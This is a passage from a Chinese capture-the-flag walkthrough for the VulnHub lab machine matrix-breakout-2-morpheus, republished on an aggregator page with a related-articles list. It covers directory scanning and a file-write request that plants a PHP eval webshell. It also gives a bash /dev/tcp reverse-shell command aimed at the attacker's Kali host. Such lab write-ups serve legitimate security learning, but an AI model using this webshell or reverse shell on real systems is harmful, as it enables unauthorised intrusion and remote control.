当前位置: 首页 > article >正文

VulnHub-matrix-breakout-2-morpheus通关攻略

        一、信息收集

        第一步:确定靶机IP为192.168.0.106

        第二步:扫描后台及开放端口

        第三步:进行敏感目录及文件扫描

#敏感目录及文件
DIRECTORY: http://192.168.0.106/javascript/ 
DIRECTORY: http://192.168.0.106/javascript/jquery/ 

http://192.168.0.106/index.html (CODE:200|SIZE:348)                           
http://192.168.0.106/robots.txt (CODE:200|SIZE:47)                            
http://192.168.0.106/server-status (CODE:403|SIZE:278)  
http://192.168.0.106/javascript/jquery/jquery (CODE:200|SIZE:287600)        
        第四步:访问敏感文件与端口,寻找有用信息

        第五步:使用gobuster进一步扫描

#使用gobuster
gobuster dir -u http://192.168.0.106 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html

/graffiti.txt         (Status: 200) [Size: 139]
/graffiti.php         (Status: 200) [Size: 451]

        

        二、网站爆破

        第一步:访问http://192.168.0.106//graffiti.php并进行留言,发现会在graffiti.txt显示

        第二步:bp抓包,重新留言,尝试写入一句话木马

message=<?php eval(@$_POST[cmd]);?>&file=shell.php
        第三步:使用蚁剑连接,在根目录下找到flag

        第四步:反弹shell,在先Kali开启监听,再在蚁剑右键打开终端输入命令回车

#蚁剑 --- 此处为Kali的IP,反弹至6666端口
/bin/bash -c 'bash -i >& /dev/tcp/192.168.0.107/6666 0>&1'

                                                                                                                        FROM  IYU_


http://www.kler.cn/a/592194.html

相关文章:

  • 启幕数据结构算法雅航新章,穿梭C++梦幻领域的探索之旅——二叉树序列构造探秘——堆的奥义与实现诗篇
  • redis缓存更新策略
  • Superagent 异步请求:如何处理复杂的 HTTP 场景
  • C#中修饰符——abstract、virtual
  • 领略算法真谛:01背包问题
  • 深入理解 Linux ALSA 音频架构:从入门到驱动开发
  • LeetCode算法题(Go语言实现)_05
  • Linux--内核进程O(1)调度队列
  • HTML 图像与多媒体元素:拓展学习边界的进度记录(一)
  • LinkedList 底层源码深度解析
  • 【蓝桥杯每日一题】3.17
  • 基于springboot的房屋租赁系统(008)
  • Mysql相关知识:存储引擎、sql执行流程、索引失效
  • AI 大模型统一集成|微服务 + 认证中心:如何保障大模型 API 的安全调用!
  • Elasticsearch 索引
  • 言简意赅 Linux部署elasticsearch7.15.2
  • C语言:编程设计猜数游戏
  • Deflate和Gzip压缩在HTTP响应中的作用与实现
  • NLP高频面试题(六)——decoder-only、encoder-only和encoder-decoder的区别与联系
  • laravel 对 数据库 json 字段的查询方式汇总